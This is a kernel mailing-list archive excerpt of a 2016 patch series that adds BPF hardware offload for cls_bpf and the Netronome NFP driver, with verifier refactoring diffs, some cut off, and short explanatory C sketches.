+#endif /* _LINUX_BPF_VERIFIER_H */
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index f5c1a4571331..9e0cd3fadf74 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -14,6 +14,7 @@
 #include 
 #include 
 #include 
+#include 
 #include 
 #include 
 #include 
@@ -126,81 +127,16 @@
  * are set to NOT_INIT to indicate that they are no longer readable.
  */
 
-struct reg_state {
-   enum bpf_reg_type type;
-   union {
-   /* valid when type == CONST_IMM | PTR_TO_STACK | UNKNOWN_VALUE 
*/
-   s64 imm;
-
-   /* valid when type == PTR_TO_PACKET* */
-   struct {
-   u32 id;
-   u16 off;
-   u16 range;
-   };
-
-   /* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
-*   PTR_TO_MAP_VALUE_OR_NULL
-*/
-   struct bpf_map *map_ptr;
-   };
-};
-
-enum bpf_stack_slot_type {
-   STACK_INVALID,/* nothing was stored in this stack slot */
-   STACK_SPILL,  /* register spilled into stack */
-   STACK_MISC/* BPF program wrote some data into this slot */
-};
-
-#define BPF_REG_SIZE 8 /* size of eBPF register in bytes */
-
-/* state of the program:
- * type of all registers and stack info
- */
-struct verifier_stat

[PATCHv6 net-next 00/15] BPF hardware offload (cls_bpf for now)

2016-09-18 Thread Jakub Kicinski

Hi!

As spotted by Daniel, the JIT might have accessed indexes past the end
of the verifier's reg_state array.

v6 (patch 8 only):
 - explicitly check for registers >= MAX_BPF_REG;
 - fix leaky error path.
v5:
 - fix names of guard defines in bpf_verifier.h.
v4:
 - rename parser -> analyzer;
 - reorganize the analyzer patches a bit;
 - use bitfield.h directly.

--- merge blurb:
In the last year a lot of progress has been made on offloading
simpler TC classifiers.  There is also growing interest in using
BPF for generic high-speed packet processing in the kernel.
It seems beneficial to tie those two trends together and think
about hardware offloads of BPF programs.  This patch set presents
such an offload for Netronome smart NICs.  cls_bpf is extended with
hardware offload capabilities and the NFP driver gets a JIT translator
which, in the presence of capable firmware, can be used to offload
the BPF program onto the card.

The BPF JIT implementation is not 100% complete (e.g. missing
instructions) but it is functional.  Encouragingly, it should be
possible to offload most (if not all) advanced BPF features onto the
NIC, including packet modification, maps, tunnel encap/decap etc.

Example of basic tests I used:
  __section_cls_entry
  int cls_entry(struct __sk_buff *skb)
  {
          if (load_byte(skb, 0) != 0x0)
                  return 0;

          if (load_byte(skb, 4) != 0x1)
                  return 0;

          skb->mark = 0xcafe;

          if (load_byte(skb, 50) != 0xff)
                  return 0;

          return ~0U;
  }

The above code can be compiled with Clang and loaded like this:
# ethtool -K p1p1 hw-tc-offload on
# tc qdisc add dev p1p1 ingress
# tc filter add dev p1p1 parent :  bpf obj prog.o action drop

This set implements the basic transparent offload, the skip_{sw,hw}
flags and reporting statistics for cls_bpf.
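
The skip_{sw,hw} flag check that the cls_bpf patches apply to
TCA_BPF_FLAGS_GEN can be sketched in plain userspace C.  This is a
minimal sketch, not the kernel code: the EX_* names and bit values are
hypothetical, and it assumes that unknown bits are rejected and that
asking to skip both software and hardware at once is rejected too.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical flag bits, named for illustration only. */
#define EX_FLAG_SKIP_HW     (1u << 0) /* do not offload, software only */
#define EX_FLAG_SKIP_SW     (1u << 1) /* do not run in software, hardware only */
#define EX_SUPPORTED_FLAGS  (EX_FLAG_SKIP_HW | EX_FLAG_SKIP_SW)

/* Return true when the flag word is acceptable. */
static bool ex_gen_flags_valid(uint32_t flags)
{
	/* Reject any bit this sketch does not know about. */
	if (flags & ~EX_SUPPORTED_FLAGS)
		return false;

	/* Skipping both software and hardware leaves nowhere to run. */
	if ((flags & EX_SUPPORTED_FLAGS) == EX_SUPPORTED_FLAGS)
		return false;

	return true;
}
```

A flag word of zero means "offload if possible, otherwise run in
software", which is the transparent mode described above.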

Jakub Kicinski (15):
  net: cls_bpf: add hardware offload
  net: cls_bpf: limit hardware offload by software-only flag
  net: cls_bpf: add support for marking filters as hardware-only
  bpf: don't (ab)use instructions to store state
  bpf: expose internal verifier structures
  bpf: enable non-core use of the verifier
  bpf: recognize 64bit immediate loads as consts
  nfp: add BPF to NFP code translator
  nfp: bpf: add hardware bpf offload
  net: cls_bpf: allow offloaded filters to update stats
  nfp: bpf: allow offloaded filters to update stats
  nfp: bpf: add packet marking support
  net: act_mirred: allow statistic updates from offloaded actions
  nfp: bpf: add support for legacy redirect action
  nfp: bpf: add offload of TC direct action mode

 drivers/net/ethernet/netronome/nfp/Makefile|7 +
 drivers/net/ethernet/netronome/nfp/nfp_asm.h   |  233 +++
 drivers/net/ethernet/netronome/nfp/nfp_bpf.h   |  212 +++
 drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c   | 1811 
 .../net/ethernet/netronome/nfp/nfp_bpf_verifier.c  |  171 ++
 drivers/net/ethernet/netronome/nfp/nfp_net.h   |   47 +-
 .../net/ethernet/netronome/nfp/nfp_net_common.c|  134 +-
 drivers/net/ethernet/netronome/nfp/nfp_net_ctrl.h  |   51 +-
 .../net/ethernet/netronome/nfp/nfp_net_ethtool.c   |   12 +
 .../net/ethernet/netronome/nfp/nfp_net_offload.c   |  291 
 .../net/ethernet/netronome/nfp/nfp_netvf_main.c|2 +-
 include/linux/bpf_verifier.h   |   89 +
 include/linux/netdevice.h  |2 +
 include/net/pkt_cls.h  |   16 +
 include/uapi/linux/pkt_cls.h   |1 +
 kernel/bpf/verifier.c  |  384 +++--
 net/sched/act_mirred.c |8 +
 net/sched/cls_bpf.c|  117 +-
 18 files changed, 3382 insertions(+), 206 deletions(-)
 create mode 100644 drivers/net/ethernet/netronome/nfp/nfp_asm.h
 create mode 100644 drivers/net/ethernet/netronome/nfp/nfp_bpf.h
 create mode 100644 drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c
 create mode 100644 drivers/net/ethernet/netronome/nfp/nfp_bpf_verifier.c
 create mode 100644 drivers/net/ethernet/netronome/nfp/nfp_net_offload.c
 create mode 100644 include/linux/bpf_verifier.h

-- 
1.9.1

[PATCHv6 net-next 04/15] bpf: don't (ab)use instructions to store state

2016-09-18 Thread Jakub Kicinski

Storing state in reserved fields of instructions makes
it impossible to run the verifier on programs already
marked as read-only. Allocate and use an array of
per-instruction state instead.

While touching the error path, rename and move the existing
jump target.
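
The idea of keeping per-instruction state in a side array, rather than
in the instruction itself, can be sketched as follows.  This is a
userspace illustration under stated assumptions: the ex_* names and the
enum values are hypothetical, and only the "first visit records the
type, later visits must agree when a context pointer is involved" rule
from the diff below is modelled.

```c
#include <stdlib.h>

/* Hypothetical pointer classes; EX_NOT_INIT must be 0 so that a
 * zeroed array starts out "not yet seen".
 */
enum ex_reg_type {
	EX_NOT_INIT = 0,
	EX_PTR_TO_CTX,
	EX_PTR_TO_STACK,
	EX_PTR_TO_MAP_VALUE,
};

struct ex_insn_aux {
	enum ex_reg_type ptr_type; /* pointer type seen at this insn */
};

/* Allocate one zeroed aux entry per instruction. */
static struct ex_insn_aux *ex_aux_alloc(size_t insn_cnt)
{
	return calloc(insn_cnt, sizeof(struct ex_insn_aux));
}

/* Record the pointer type seen at instruction idx.
 * Returns 0 on success, -1 when the same instruction is reached with
 * a different pointer type and either type is a context pointer.
 */
static int ex_note_ptr_type(struct ex_insn_aux *aux, size_t idx,
			    enum ex_reg_type seen)
{
	enum ex_reg_type *prev = &aux[idx].ptr_type;

	if (*prev == EX_NOT_INIT) {
		*prev = seen; /* first visit: remember the type */
		return 0;
	}
	if (seen != *prev &&
	    (seen == EX_PTR_TO_CTX || *prev == EX_PTR_TO_CTX))
		return -1;

	return 0;
}
```

Because the program's instructions are never written, the same check
works on a program whose image is already read-only.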

Suggested-by: Alexei Starovoitov 
Signed-off-by: Jakub Kicinski 
Acked-by: Alexei Starovoitov 
Acked-by: Daniel Borkmann 
---
v3:
 - new patch.
---
 kernel/bpf/verifier.c | 51 ---
 1 file changed, 32 insertions(+), 19 deletions(-)

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 90493a66..f5c1a4571331 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -181,6 +181,10 @@ struct verifier_stack_elem {
struct verifier_stack_elem *next;
 };
 
+struct bpf_insn_aux_data {
+   enum bpf_reg_type ptr_type; /* pointer type for load/store insns */
+};
+
 #define MAX_USED_MAPS 64 /* max number of maps accessed by one eBPF program */
 
 /* single container for all structs
@@ -196,6 +200,7 @@ struct verifier_env {
u32 used_map_cnt;   /* number of used maps */
u32 id_gen; /* used to generate unique reg IDs */
bool allow_ptr_leaks;
+   struct bpf_insn_aux_data *insn_aux_data; /* array of per-insn state */
 };
 
 #define BPF_COMPLEXITY_LIMIT_INSNS 65536
@@ -2334,7 +2339,7 @@ static int do_check(struct verifier_env *env)
return err;
 
} else if (class == BPF_LDX) {
-   enum bpf_reg_type src_reg_type;
+   enum bpf_reg_type *prev_src_type, src_reg_type;
 
/* check for reserved fields is already done */
 
@@ -2364,16 +2369,18 @@ static int do_check(struct verifier_env *env)
continue;
}
 
-   if (insn->imm == 0) {
+   prev_src_type = &env->insn_aux_data[insn_idx].ptr_type;
+
+   if (*prev_src_type == NOT_INIT) {
/* saw a valid insn
 * dst_reg = *(u32 *)(src_reg + off)
-* use reserved 'imm' field to mark this insn
+* save type to validate intersecting paths
 */
-   insn->imm = src_reg_type;
+   *prev_src_type = src_reg_type;
 
-   } else if (src_reg_type != insn->imm &&
+   } else if (src_reg_type != *prev_src_type &&
   (src_reg_type == PTR_TO_CTX ||
-   insn->imm == PTR_TO_CTX)) {
+   *prev_src_type == PTR_TO_CTX)) {
/* ABuser program is trying to use the same insn
 * dst_reg = *(u32*) (src_reg + off)
 * with different pointer types:
@@ -2386,7 +2393,7 @@ static int do_check(struct verifier_env *env)
}
 
} else if (class == BPF_STX) {
-   enum bpf_reg_type dst_reg_type;
+   enum bpf_reg_type *prev_dst_type, dst_reg_type;
 
if (BPF_MODE(insn->code) == BPF_XADD) {
err = check_xadd(env, insn);
@@ -2414,11 +2421,13 @@ static int do_check(struct verifier_env *env)
if (err)
return err;
 
-   if (insn->imm == 0) {
-   insn->imm = dst_reg_type;
-   } else if (dst_reg_type != insn->imm &&
+   prev_dst_type = &env->insn_aux_data[insn_idx].ptr_type;
+
+   if (*prev_dst_type == NOT_INIT) {
+   *prev_dst_type = dst_reg_type;
+   } else if (dst_reg_type != *prev_dst_type &&
   (dst_reg_type == PTR_TO_CTX ||
-   insn->imm == PTR_TO_CTX)) {
+   *prev_dst_type == PTR_TO_CTX)) {
verbose("same insn cannot be used with 
different pointers\n");
return -EINVAL;
}
@@ -2697,11 +2706,8 @@ static int convert_ctx_accesses(struct verifier_env *env)
else
continue;
 
-   if (insn->imm != PTR_TO_CTX) {
-   /* clear internal mark */
-   insn->imm = 0;
+   if (env->insn_aux_data[i].ptr_type != PTR_TO_CTX)
continue;
-   }
 
cnt = env->prog->aux->ops->
convert_ctx_access(type, insn->dst_reg, insn->src_reg,
@@ -2766,6 +2772,11 @@ int bpf_check(struct bpf_prog **prog, union bpf_attr 
*attr)

[PATCHv6 net-next 06/15] bpf: enable non-core use of the verifier

2016-09-18 Thread Jakub Kicinski

Advanced JIT compilers and translators may want to use the
eBPF verifier as a base for parsers or to perform custom
checks and validations.

Add the ability for external users to invoke the verifier
and provide callbacks to be invoked for every instruction
checked.  For now, only the most basic callback, for
per-instruction pre-interpretation checks, is added.  More
advanced users may also like to have a per-instruction post
callback and a state comparison callback.
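
The callback arrangement described above can be sketched in userspace C.
This is an illustration only: every ex_* name is hypothetical, and the
walker visits instructions linearly, whereas the real verifier follows
branches and prunes states.

```c
#include <stddef.h>

struct ex_env;

/* Table of optional callbacks supplied by the external analyzer. */
struct ex_analyzer_ops {
	int (*insn_hook)(struct ex_env *env, int insn_idx, int prev_insn_idx);
};

struct ex_env {
	int insn_cnt;                      /* number of instructions */
	const struct ex_analyzer_ops *ops; /* may be NULL */
	void *priv;                        /* analyzer's private data */
};

/* Call the hook if one is registered; no hook means "no objection". */
static int ex_call_hook(struct ex_env *env, int insn_idx, int prev_insn_idx)
{
	if (!env->ops || !env->ops->insn_hook)
		return 0;

	return env->ops->insn_hook(env, insn_idx, prev_insn_idx);
}

/* Simplified linear walk: stop at the first non-zero hook result. */
static int ex_walk(struct ex_env *env)
{
	int prev = -1;

	for (int i = 0; i < env->insn_cnt; i++) {
		int err = ex_call_hook(env, i, prev);

		if (err)
			return err;
		prev = i;
	}
	return 0;
}

/* Example hook: counts accepted instructions, rejects index 3. */
static int ex_count_hook(struct ex_env *env, int insn_idx, int prev_insn_idx)
{
	int *count = env->priv;

	(void)prev_insn_idx;
	if (insn_idx == 3)
		return -1;
	(*count)++;
	return 0;
}
```

Running the hook before each instruction is interpreted lets an
analyzer veto unsupported instructions early, using the verifier state
as it stands on entry to that instruction.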

Signed-off-by: Jakub Kicinski 
Acked-by: Alexei Starovoitov 
---
v4:
 - separate from the header split patch.
---
 include/linux/bpf_verifier.h | 11 +++
 kernel/bpf/verifier.c| 68 
 2 files changed, 79 insertions(+)

diff --git a/include/linux/bpf_verifier.h b/include/linux/bpf_verifier.h
index 9056117b4a81..925359e1d9a1 100644
--- a/include/linux/bpf_verifier.h
+++ b/include/linux/bpf_verifier.h
@@ -59,6 +59,12 @@ struct bpf_insn_aux_data {
 
 #define MAX_USED_MAPS 64 /* max number of maps accessed by one eBPF program */
 
+struct bpf_verifier_env;
+struct bpf_ext_analyzer_ops {
+   int (*insn_hook)(struct bpf_verifier_env *env,
+int insn_idx, int prev_insn_idx);
+};
+
 /* single container for all structs
  * one verifier_env per bpf_check() call
  */
@@ -68,6 +74,8 @@ struct bpf_verifier_env {
int stack_size; /* number of states to be processed */
struct bpf_verifier_state cur_state; /* current verifier state */
struct bpf_verifier_state_list **explored_states; /* search pruning 
optimization */
+   const struct bpf_ext_analyzer_ops *analyzer_ops; /* external analyzer 
ops */
+   void *analyzer_priv; /* pointer to external analyzer's private data */
struct bpf_map *used_maps[MAX_USED_MAPS]; /* array of map's used by 
eBPF program */
u32 used_map_cnt;   /* number of used maps */
u32 id_gen; /* used to generate unique reg IDs */
@@ -75,4 +83,7 @@ struct bpf_verifier_env {
struct bpf_insn_aux_data *insn_aux_data; /* array of per-insn state */
 };
 
+int bpf_analyzer(struct bpf_prog *prog, const struct bpf_ext_analyzer_ops *ops,
+void *priv);
+
 #endif /* _LINUX_BPF_VERIFIER_H */
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 9e0cd3fadf74..ff03cd07f761 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -624,6 +624,10 @@ static int check_packet_access(struct bpf_verifier_env 
*env, u32 regno, int off,
 static int check_ctx_access(struct bpf_verifier_env *env, int off, int size,
enum bpf_access_type t, enum bpf_reg_type *reg_type)
 {
+   /* for analyzer ctx accesses are already validated and converted */
+   if (env->analyzer_ops)
+   return 0;
+
if (env->prog->aux->ops->is_valid_access &&
env->prog->aux->ops->is_valid_access(off, size, t, reg_type)) {
/* remember the offset of last byte accessed in ctx */
@@ -2216,6 +2220,15 @@ static int is_state_visited(struct bpf_verifier_env 
*env, int insn_idx)
return 0;
 }
 
+static int ext_analyzer_insn_hook(struct bpf_verifier_env *env,
+ int insn_idx, int prev_insn_idx)
+{
+   if (!env->analyzer_ops || !env->analyzer_ops->insn_hook)
+   return 0;
+
+   return env->analyzer_ops->insn_hook(env, insn_idx, prev_insn_idx);
+}
+
 static int do_check(struct bpf_verifier_env *env)
 {
struct bpf_verifier_state *state = &env->cur_state;
@@ -2274,6 +2287,10 @@ static int do_check(struct bpf_verifier_env *env)
print_bpf_insn(insn);
}
 
+   err = ext_analyzer_insn_hook(env, insn_idx, prev_insn_idx);
+   if (err)
+   return err;
+
if (class == BPF_ALU || class == BPF_ALU64) {
err = check_alu_op(env, insn);
if (err)
@@ -2823,3 +2840,54 @@ int bpf_check(struct bpf_prog **prog, union bpf_attr 
*attr)
kfree(env);
return ret;
 }
+
+int bpf_analyzer(struct bpf_prog *prog, const struct bpf_ext_analyzer_ops *ops,
+void *priv)
+{
+   struct bpf_verifier_env *env;
+   int ret;
+
+   env = kzalloc(sizeof(struct bpf_verifier_env), GFP_KERNEL);
+   if (!env)
+   return -ENOMEM;
+
+   env->insn_aux_data = vzalloc(sizeof(struct bpf_insn_aux_data) *
+prog->len);
+   ret = -ENOMEM;
+   if (!env->insn_aux_data)
+   goto err_free_env;
+   env->prog = prog;
+   env->analyzer_ops = ops;
+   env->analyzer_priv = priv;
+
+   /* grab the mutex to protect few globals used by verifier */
+   mutex_lock(&bpf_verifier_lock);
+
+   log_level = 0;
+
+   env->explored_states = kcalloc(env->prog->len,
+  sizeof(struct bpf_verifier_state_list *),
+

[PATCHv6 net-next 01/15] net: cls_bpf: add hardware offload

2016-09-18 Thread Jakub Kicinski

This patch adds hardware offload capability to the cls_bpf classifier,
similar to what has been done with U32 and flower.
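
The choice between the ADD, REPLACE and DESTROY commands made in
cls_bpf_offload() below can be summarised by a small decision function.
This is a sketch with hypothetical ex_* names; it models only the
command selection, not the driver call or the bookkeeping of the
offloaded flag.

```c
#include <stdbool.h>

enum ex_cmd {
	EX_CMD_NONE,    /* nothing to tell the driver */
	EX_CMD_ADD,     /* offload a new program */
	EX_CMD_REPLACE, /* swap an already offloaded program */
	EX_CMD_DESTROY, /* remove the previously offloaded program */
};

/* old_offloaded:  an earlier program exists and is in hardware
 * should_offload: the device and filter settings permit offload now
 */
static enum ex_cmd ex_pick_cmd(bool old_offloaded, bool should_offload)
{
	if (old_offloaded)
		return should_offload ? EX_CMD_REPLACE : EX_CMD_DESTROY;

	return should_offload ? EX_CMD_ADD : EX_CMD_NONE;
}
```

Note that in the DESTROY case the command is issued for the old
program, not the new one, since the new program stays in software.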

Signed-off-by: Jakub Kicinski 
Acked-by: Daniel Borkmann 
---
v3:
 - s/filter/prog/ in struct tc_cls_bpf_offload.
v2:
 - drop unnecessary WARN_ON;
 - reformat error handling a bit.
---
 include/linux/netdevice.h |  2 ++
 include/net/pkt_cls.h | 14 ++
 net/sched/cls_bpf.c   | 70 +++
 3 files changed, 86 insertions(+)

diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
index 2095b6ab3661..3c50db29a114 100644
--- a/include/linux/netdevice.h
+++ b/include/linux/netdevice.h
@@ -789,6 +789,7 @@ enum {
TC_SETUP_CLSU32,
TC_SETUP_CLSFLOWER,
TC_SETUP_MATCHALL,
+   TC_SETUP_CLSBPF,
 };
 
 struct tc_cls_u32_offload;
@@ -800,6 +801,7 @@ struct tc_to_netdev {
struct tc_cls_u32_offload *cls_u32;
struct tc_cls_flower_offload *cls_flower;
struct tc_cls_matchall_offload *cls_mall;
+   struct tc_cls_bpf_offload *cls_bpf;
};
 };
 
diff --git a/include/net/pkt_cls.h b/include/net/pkt_cls.h
index a459be5fe1c2..41e8071dff87 100644
--- a/include/net/pkt_cls.h
+++ b/include/net/pkt_cls.h
@@ -486,4 +486,18 @@ struct tc_cls_matchall_offload {
unsigned long cookie;
 };
 
+enum tc_clsbpf_command {
+   TC_CLSBPF_ADD,
+   TC_CLSBPF_REPLACE,
+   TC_CLSBPF_DESTROY,
+};
+
+struct tc_cls_bpf_offload {
+   enum tc_clsbpf_command command;
+   struct tcf_exts *exts;
+   struct bpf_prog *prog;
+   const char *name;
+   bool exts_integrated;
+};
+
 #endif
diff --git a/net/sched/cls_bpf.c b/net/sched/cls_bpf.c
index 1d92d4d3f222..3ca9502a881c 100644
--- a/net/sched/cls_bpf.c
+++ b/net/sched/cls_bpf.c
@@ -39,6 +39,7 @@ struct cls_bpf_prog {
struct list_head link;
struct tcf_result res;
bool exts_integrated;
+   bool offloaded;
struct tcf_exts exts;
u32 handle;
union {
@@ -137,6 +138,71 @@ static bool cls_bpf_is_ebpf(const struct cls_bpf_prog 
*prog)
return !prog->bpf_ops;
 }
 
+static int cls_bpf_offload_cmd(struct tcf_proto *tp, struct cls_bpf_prog *prog,
+  enum tc_clsbpf_command cmd)
+{
+   struct net_device *dev = tp->q->dev_queue->dev;
+   struct tc_cls_bpf_offload bpf_offload = {};
+   struct tc_to_netdev offload;
+
+   offload.type = TC_SETUP_CLSBPF;
+   offload.cls_bpf = &bpf_offload;
+
+   bpf_offload.command = cmd;
+   bpf_offload.exts = &prog->exts;
+   bpf_offload.prog = prog->filter;
+   bpf_offload.name = prog->bpf_name;
+   bpf_offload.exts_integrated = prog->exts_integrated;
+
+   return dev->netdev_ops->ndo_setup_tc(dev, tp->q->handle,
+tp->protocol, &offload);
+}
+
+static void cls_bpf_offload(struct tcf_proto *tp, struct cls_bpf_prog *prog,
+   struct cls_bpf_prog *oldprog)
+{
+   struct net_device *dev = tp->q->dev_queue->dev;
+   struct cls_bpf_prog *obj = prog;
+   enum tc_clsbpf_command cmd;
+
+   if (oldprog && oldprog->offloaded) {
+   if (tc_should_offload(dev, tp, 0)) {
+   cmd = TC_CLSBPF_REPLACE;
+   } else {
+   obj = oldprog;
+   cmd = TC_CLSBPF_DESTROY;
+   }
+   } else {
+   if (!tc_should_offload(dev, tp, 0))
+   return;
+   cmd = TC_CLSBPF_ADD;
+   }
+
+   if (cls_bpf_offload_cmd(tp, obj, cmd))
+   return;
+
+   obj->offloaded = true;
+   if (oldprog)
+   oldprog->offloaded = false;
+}
+
+static void cls_bpf_stop_offload(struct tcf_proto *tp,
+struct cls_bpf_prog *prog)
+{
+   int err;
+
+   if (!prog->offloaded)
+   return;
+
+   err = cls_bpf_offload_cmd(tp, prog, TC_CLSBPF_DESTROY);
+   if (err) {
+   pr_err("Stopping hardware offload failed: %d\n", err);
+   return;
+   }
+
+   prog->offloaded = false;
+}
+
 static int cls_bpf_init(struct tcf_proto *tp)
 {
struct cls_bpf_head *head;
@@ -176,6 +242,7 @@ static int cls_bpf_delete(struct tcf_proto *tp, unsigned 
long arg)
 {
struct cls_bpf_prog *prog = (struct cls_bpf_prog *) arg;
 
+   cls_bpf_stop_offload(tp, prog);
list_del_rcu(&prog->link);
tcf_unbind_filter(tp, &prog->res);
call_rcu(&prog->rcu, __cls_bpf_delete_prog);
@@ -192,6 +259,7 @@ static bool cls_bpf_destroy(struct tcf_proto *tp, bool 
force)
return false;
 
list_for_each_entry_safe(prog, tmp, &head->plist, link) {
+   cls_bpf_stop_offload(tp, prog);
list_del_rcu(&prog->link);
tcf_unbind_filter(tp, &prog->res);
call_rcu(&prog->rcu, __cls_bpf_delete_prog);
@@ -413,6 +

[PATCHv6 net-next 09/15] nfp: bpf: add hardware bpf offload

2016-09-18 Thread Jakub Kicinski

Add hardware bpf offload on our smart NICs.  Detect if
capable firmware is loaded and use it to load the code JITed
with the just-added translator onto the programmable engines.

This commit only supports offloading cls_bpf in legacy mode
(non-direct action).

Signed-off-by: Jakub Kicinski 
---
 drivers/net/ethernet/netronome/nfp/Makefile|   1 +
 drivers/net/ethernet/netronome/nfp/nfp_net.h   |  26 ++-
 .../net/ethernet/netronome/nfp/nfp_net_common.c|  40 +++-
 drivers/net/ethernet/netronome/nfp/nfp_net_ctrl.h  |  44 -
 .../net/ethernet/netronome/nfp/nfp_net_offload.c   | 220 +
 5 files changed, 324 insertions(+), 7 deletions(-)
 create mode 100644 drivers/net/ethernet/netronome/nfp/nfp_net_offload.c

diff --git a/drivers/net/ethernet/netronome/nfp/Makefile 
b/drivers/net/ethernet/netronome/nfp/Makefile
index 5f12689bf523..0efb2ba9a558 100644
--- a/drivers/net/ethernet/netronome/nfp/Makefile
+++ b/drivers/net/ethernet/netronome/nfp/Makefile
@@ -3,6 +3,7 @@ obj-$(CONFIG_NFP_NETVF) += nfp_netvf.o
 nfp_netvf-objs := \
nfp_net_common.o \
nfp_net_ethtool.o \
+   nfp_net_offload.o \
nfp_netvf_main.o
 
 ifeq ($(CONFIG_BPF_SYSCALL),y)
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_net.h 
b/drivers/net/ethernet/netronome/nfp/nfp_net.h
index 690635660195..ea6f5e667f27 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_net.h
+++ b/drivers/net/ethernet/netronome/nfp/nfp_net.h
@@ -220,7 +220,7 @@ struct nfp_net_tx_ring {
 #define PCIE_DESC_RX_I_TCP_CSUM_OK cpu_to_le16(BIT(11))
 #define PCIE_DESC_RX_I_UDP_CSUMcpu_to_le16(BIT(10))
 #define PCIE_DESC_RX_I_UDP_CSUM_OK cpu_to_le16(BIT(9))
-#define PCIE_DESC_RX_SPARE cpu_to_le16(BIT(8))
+#define PCIE_DESC_RX_BPF   cpu_to_le16(BIT(8))
 #define PCIE_DESC_RX_EOP   cpu_to_le16(BIT(7))
 #define PCIE_DESC_RX_IP4_CSUM  cpu_to_le16(BIT(6))
 #define PCIE_DESC_RX_IP4_CSUM_OK   cpu_to_le16(BIT(5))
@@ -413,6 +413,7 @@ static inline bool nfp_net_fw_ver_eq(struct 
nfp_net_fw_version *fw_ver,
  * @is_vf:  Is the driver attached to a VF?
  * @is_nfp3200: Is the driver for a NFP-3200 card?
  * @fw_loaded:  Is the firmware loaded?
+ * @bpf_offload_skip_sw:  Offloaded BPF program will not be rerun by cls_bpf
  * @ctrl:   Local copy of the control register/word.
  * @fl_bufsz:   Currently configured size of the freelist buffers
  * @rx_offset: Offset in the RX buffers where packet data starts
@@ -473,6 +474,7 @@ struct nfp_net {
unsigned is_vf:1;
unsigned is_nfp3200:1;
unsigned fw_loaded:1;
+   unsigned bpf_offload_skip_sw:1;
 
u32 ctrl;
u32 fl_bufsz;
@@ -561,12 +563,28 @@ struct nfp_net {
 /* Functions to read/write from/to a BAR
  * Performs any endian conversion necessary.
  */
+static inline u16 nn_readb(struct nfp_net *nn, int off)
+{
+   return readb(nn->ctrl_bar + off);
+}
+
 static inline void nn_writeb(struct nfp_net *nn, int off, u8 val)
 {
writeb(val, nn->ctrl_bar + off);
 }
 
-/* NFP-3200 can't handle 16-bit accesses too well - hence no readw/writew */
+/* NFP-3200 can't handle 16-bit accesses too well */
+static inline u16 nn_readw(struct nfp_net *nn, int off)
+{
+   WARN_ON_ONCE(nn->is_nfp3200);
+   return readw(nn->ctrl_bar + off);
+}
+
+static inline void nn_writew(struct nfp_net *nn, int off, u16 val)
+{
+   WARN_ON_ONCE(nn->is_nfp3200);
+   writew(val, nn->ctrl_bar + off);
+}
 
 static inline u32 nn_readl(struct nfp_net *nn, int off)
 {
@@ -757,4 +775,8 @@ static inline void nfp_net_debugfs_adapter_del(struct 
nfp_net *nn)
 }
 #endif /* CONFIG_NFP_NET_DEBUG */
 
+int
+nfp_net_bpf_offload(struct nfp_net *nn, u32 handle, __be16 proto,
+   struct tc_cls_bpf_offload *cls_bpf);
+
 #endif /* _NFP_NET_H_ */
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_net_common.c 
b/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
index 252e4924de0f..51978dfe883b 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
+++ b/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
@@ -60,6 +60,7 @@
 
 #include 
 
+#include 
 #include 
 
 #include "nfp_net_ctrl.h"
@@ -2382,6 +2383,31 @@ static struct rtnl_link_stats64 *nfp_net_stat64(struct 
net_device *netdev,
return stats;
 }
 
+static bool nfp_net_ebpf_capable(struct nfp_net *nn)
+{
+   if (nn->cap & NFP_NET_CFG_CTRL_BPF &&
+   nn_readb(nn, NFP_NET_CFG_BPF_ABI) == NFP_NET_BPF_ABI)
+   return true;
+   return false;
+}
+
+static int
+nfp_net_setup_tc(struct net_device *netdev, u32 handle, __be16 proto,
+struct tc_to_netdev *tc)
+{
+   struct nfp_net *nn = netdev_priv(netdev);
+
+   if (TC_H_MAJ(handle) != TC_H_MAJ(TC_H_INGRESS))
+   return -ENOTSUPP;
+   if (proto != htons(ETH_P_ALL))
+   return -ENOTSUPP;
+
+   if (tc->type == TC_SETUP_CLSBPF && nfp_ne

[PATCHv6 net-next 12/15] nfp: bpf: add packet marking support

2016-09-18 Thread Jakub Kicinski

Add missing ABI defines and eBPF instructions to allow the
mark to be passed on, and extend prepend parsing on the
RX path to pick it up from packet metadata.

Signed-off-by: Jakub Kicinski 
---
v3:
 - change metadata format.
---
 drivers/net/ethernet/netronome/nfp/nfp_bpf.h   |  2 +
 drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c   | 19 +
 drivers/net/ethernet/netronome/nfp/nfp_net.h   |  2 +
 .../net/ethernet/netronome/nfp/nfp_net_common.c| 91 +-
 drivers/net/ethernet/netronome/nfp/nfp_net_ctrl.h  |  7 ++
 .../net/ethernet/netronome/nfp/nfp_netvf_main.c|  2 +-
 6 files changed, 101 insertions(+), 22 deletions(-)

diff --git a/drivers/net/ethernet/netronome/nfp/nfp_bpf.h 
b/drivers/net/ethernet/netronome/nfp/nfp_bpf.h
index 3726421e353f..2adb1d80c7b7 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_bpf.h
+++ b/drivers/net/ethernet/netronome/nfp/nfp_bpf.h
@@ -91,6 +91,8 @@ enum nfp_bpf_reg_type {
 #define imm_both(np)   reg_both((np)->regs_per_thread - STATIC_REG_IMM)
 
 #define NFP_BPF_ABI_FLAGS  reg_nnr(0)
+#define   NFP_BPF_ABI_FLAG_MARK1
+#define NFP_BPF_ABI_MARK   reg_nnr(1)
 #define NFP_BPF_ABI_PKTreg_nnr(2)
 #define NFP_BPF_ABI_LENreg_nnr(3)
 
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c 
b/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c
index cfbf53607fc9..368381f0357f 100644
